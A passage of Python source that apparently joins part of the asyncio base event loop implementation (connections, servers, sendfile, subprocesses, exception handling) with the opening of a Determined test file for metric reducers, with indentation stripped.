responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
# Only check when the default executor is being used
self._check_default_executor()
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor(
thread_name_prefix='asyncio'
)
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
warnings.warn(
'Using the default executor that is not an instance of '
'ThreadPoolExecutor is deprecated and will be prohibited '
'in Python 3.9',
DeprecationWarning, 2)
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
_check_ssl_socket(sock)
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
"""Create, bind and connect one socket."""
my_exceptions = []
exceptions.append(my_exceptions)
family, type_, proto, _, address = addr_info
sock = None
try:
sock = socket.socket(family=family, type=type_, proto=proto)
sock.setblocking(False)
if local_addr_infos is not None:
for _, _, _, _, laddr in local_addr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
my_exceptions.append(exc)
else: # all bind attempts failed
raise my_exceptions.pop()
await self.sock_connect(sock, address)
return sock
except OSError as exc:
my_exceptions.append(exc)
if sock is not None:
sock.close()
raise
except:
if sock is not None:
sock.close()
raise
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None,
happy_eyeballs_delay=None, interleave=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given Internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
if happy_eyeballs_delay is not None and interleave is None:
# If using happy eyeballs, default to interleave addresses by family
interleave = 1
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
else:
laddr_infos = None
if interleave:
infos = _interleave_addrinfos(infos, interleave)
exceptions = []
if happy_eyeballs_delay is None:
# not using happy eyeballs
for addrinfo in infos:
try:
sock = await self._connect_sock(
exceptions, addrinfo, laddr_infos)
break
except OSError:
continue
else: # using happy eyeballs
sock, _, _ = await staggered.staggered_race(
(functools.partial(self._connect_sock,
exceptions, addrinfo, laddr_infos)
for addrinfo in infos),
happy_eyeballs_delay, loop=self)
if sock is None:
exceptions = [exc for sub in exceptions for exc in sub]
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
'host and port was not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
sending the file until EOF is reached. File position is updated on
return or also in case of error in which case file.tell()
can be used to figure out the number of bytes
which were sent.
fallback set to True makes asyncio to manually read and send
the file when the platform does not support the sendfile syscall
(e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except BaseException:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_address=_unset, reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_address=reuse_address, reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
if local_addr and local_addr[0] not in (0, '\x00'):
try:
if stat.S_ISSOCK(os.stat(local_addr).st_mode):
os.remove(local_addr)
except FileNotFoundError:
pass
except OSError as err:
# Directory may have permissions only to create socket.
logger.error('Unable to check or remove stale UNIX '
'socket %r: %r',
local_addr, err)
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = {} # Using order preserving dict
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
if not (isinstance(addr, tuple) and len(addr) == 2):
raise TypeError('2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
# bpo-37228
if reuse_address is not _unset:
if reuse_address:
raise ValueError("Passing `reuse_address=True` is no "
"longer supported, as the usage of "
"SO_REUSEPORT in UDP poses a significant "
"security concern.")
else:
warnings.warn("The *reuse_address* parameter has been "
"deprecated as of 3.5.10 and is scheduled "
"for removal in 3.11.", DeprecationWarning,
stacklevel=2)
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
start_serving=True):
"""Create a TCP server.
The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks._gather(*fs, loop=self)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
"""Handle an accepted connection.
This is used by servers that accept connections outside of
asyncio but that use asyncio to handle connections.
This method is a coroutine. When completed, the coroutine
returns a (transport, protocol) pair.
"""
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
New keys maybe introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
|
test_reducer.py | import itertools
import logging
import threading
import traceback
from collections import namedtuple
from typing import Any, Callable, List
import numpy as np
import pytest
from determined import _core
from determined.pytorch import Reducer, _PyTorchReducerContext, _simple_reduce_metrics
logger = logging.getLogger(__name__)
def test_reducer() -> None:
metrics = np.array([0.25, 0.5, 0.75, 1, 25.5, 1.9])
assert np.around(_simple_reduce_metrics(Reducer.AVG, metrics), decimals=2) == 4.98
assert _simple_reduce_metrics(Reducer.SUM, metrics) == 29.9
assert _simple_reduce_metrics(Reducer.MIN, metrics) == 0.25
assert _simple_reduce_metrics(Reducer.MAX, metrics) == 25.5
batches_per_process = [1, 2, 5, 4, 5, 6]
assert (
np.around(_simple_reduce_metrics(Reducer.AVG, metrics, batches_per_process), decimals=2)
== 6.43
)
DummyDistributedReducerContext = namedtuple(
"DummyDistributedReducerContext", "distributed_context reducer_context wrapped_reducer"
)
def dummy_reducer(values: List) -> Any:
logger.debug(f"reducing {values}")
flat = [v for sublist in values for v in sublist]
return {"values": flat, "sum": sum(flat)}
@pytest.mark.parametrize("cross_size", [1, 3])
@pytest.mark.parametrize("local_size", [1, 3])
def test_custom_reducer_slot_order(cross_size: int, local_size: int) -> None:
size = cross_size * local_size
dataset_size = 47
def do_parallel(fn: Callable) -> List:
"""
Run the same function on one-thread-per-rank, assert there were no exceptions, and return
the results from each rank.
"""
results = [None] * size # type: List
errors = [None] * size # type: List
threads = []
for cross_rank, local_rank in itertools.product(range(cross_size), range(local_size)):
rank = cross_rank * local_size + local_rank
def _fn(rank: int, cross_rank: int, local_rank: int) -> None:
try:
results[rank] = fn(rank, cross_rank, local_rank)
except Exception:
errors[rank] = traceback.format_exc()
raise
threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank)))
# encourage allgather to occur in not-the-correct order to test the reordering
for thread in reversed(threads):
thread.start()
for thread in threads:
thread.join()
assert errors == [None] * size, "not all threads exited without error"
return results
def make_reducer_context(
rank: int, cross_rank: int, local_rank: int
) -> DummyDistributedReducerContext:
distributed_context = _core.DistributedContext(
rank=cross_rank * local_size + local_rank,
size=cross_size * local_size,
local_rank=local_rank,
local_size=local_size,
cross_rank=cross_rank,
cross_size=cross_size,
chief_ip="localhost",
force_tcp=False,
)
